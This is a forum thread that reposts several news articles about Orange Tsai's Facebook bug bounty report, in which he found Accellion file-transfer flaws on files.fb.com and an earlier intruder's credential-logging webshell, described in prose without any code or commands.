Bug Hunter Hacks Facebook, Finds Someone Else's Backdoor Script

[Alkajak]

Content source

http://news.softpedia.com/news/bug-hunter-hacks-facebook-finds-someone-else-s-backdoor-script-503279.shtml

While trying to find bugs in Facebook's services, a security researcher accidentally stumbled over a hacker's backdoor script that was logging Facebook employee credentials for some of the company's backend applications.

Orange Tsai, a consultant for DevCore, also spends a lot of his free time helping big name companies fix vulnerabilities via their bug bounty programs. At the end of February, Tsai decided to give Facebook's bug bounty program another try and started mapping some of the company's backend services for possible servers he might hack.

Researcher hacks Facebook's internal file sharing application

His search led him to the files.fb.com domain, which is an online file transfer and file hosting service, running on Accellion’s Secure File Transfer (FTA) application.

After identifying the application's type and version, the researcher went to work and explored its source code, discovering in three cross-site scripting (XSS) flaws, two local privilege escalation issues, a known-secret-key issue that led to remote code execution, and a pre-auth SQL injection that also led to remote code execution.

The researcher used the SQL injection flaw he discovered in the FTA application to access Facebook's server and was rewarded with complete control over the machine.

With his goal reached, the researcher then started collecting the necessary information to submit a bug report to Facebook's staff. While looking at one of the server's logs, Tsai discovered a lot of suspicious error messages.

Somebody already hacked the server and not part of the bug bounty program
He tracked these messages down to a webshell, which he was sure, and quite obvious, that no Facebook employee ever uploaded. Inspecting the webshell's source code, Tsai found evidence of a server-side keylogger which was intercepting login operations and storing Facebook employee access credentials in a local log file.

The researcher then looked at other log files that showed how the hacker came back at various intervals to collect the logged data, map the local network, and attempt to steal SSL private keys.

Details revealed two separate periods when the hacker was active, one in July 2015, and then one in mid-September 2015.

Tsai filed a bug report with Facebook about the incident, who started an in-house forensics investigation, and rewarded the researcher with $10,000 (€8,850) for his efforts.



The webshell on Facebook's server

 

[frogboy]

A researcher received $10,000 from Facebook after uncovering a serious vulnerability and a malicious web shell left behind by hackers on one of the social media giant’s servers.

Orange Tsai, a consultant at DevCore, had been analyzing Facebook’s infrastructure when he came across a domain called files.fb.com. The domain hosted a login interface for an Accellion File Transfer Appliance, a device used by enterprises for secure file transfers.

While known vulnerabilities had been patched by Facebook in the Accellion product, the researcher discovered a total of 7 previously unknown issues, including cross-site scripting, local privilege escalation, and remote code execution flaws.

The expert leveraged a pre-auth SQL injection vulnerability that allowed remote code execution to upload a webshell to the Facebook server.

Once he gained control of the server, he started collecting information for a Facebook bug bounty report. That was when he discovered that someone had previously uploaded a webshell to the server.

The malicious attacker had apparently attempted to collect the login credentials of Facebook employees who used the file transfer service. Tsai discovered that the attacker’s script had harvested roughly 300 @fb.com and @facebook.com credentials between February 1 and February 7.

Full Article. Researcher Finds Malicious Web Shell on Facebook Server | SecurityWeek.Com

 

[kev216]

Facebook's internal systems were compromised and a server containing staff details was hit by malware opening up a backdoor that allowed usernames and passwords to be extracted – although this issue was reported by a bug bounty hunter and has since been fixed.

Orange Tsai was the exploit hunter in question, and he discovered the vulnerability in the Facebook server back in February, then reported it to the social network's security team.

As Betanews reports, Tsai hacked into said Facebook server and discovered password-thieving PHP scripts – obviously a very serious issue. So it isn't surprising that he received a large payment for this bit of white hat hacking, and a week after reporting the issue, he was told he'd be rewarded to the tune of $10,000 (around £7,000, or AU$13,000).

It's a worrying glimpse into how even web giants like Zuckerberg's firm are open to being exploited by just a single individual with some hacking smarts.

Note that this was a staff server and the backdoor was pilfering Facebook staff member credentials (as opposed to actual users of the social network), and Tsai says he found around 300 logged credentials dated to the first week of February when he pulled off his hack.

Not malicious
The Facebook security engineer, Reginaldo Silva, who dealt with the case said the backdoor had actually been put there by another bounty hunting security researcher, so this too was a white hat action of sorts, and apparently not a malicious attack.

Silva noted: "Neither of them were able to compromise other parts of our infrastructure, so the way we see it, it's a double win: two competent researchers assessed the system, one of them reported what he found to us and got a good bounty, none of them were able to escalate access."

According to Tsai, the other hacker made attempts to probe further and access Facebook's internal mail system, for example, but wasn't successful in these endeavours. Tsai also noted there were two periods of time when the backdoor was utilised last year, and he muses whether this might have been different hackers doing so – although Facebook clearly believes this was just one person.

Of course, the hole has now been patched up and Facebook conducted an extensive forensics investigation over the past couple of months, which was completed last week, leaving Tsai free to post about and discuss the issue.

A details guide on how he did it can be found on his blog: How I Hacked Facebook, and Found Someone's Backdoor Script | DEVCORE 戴夫寇爾

 

[Noxx]

Maybe Facebook should spend less time making their site look so unnecessary complex and spend more time on security. Anyone else wish that they'd just return to the old-school format? I can't stand logging on because it's just clunky as heck.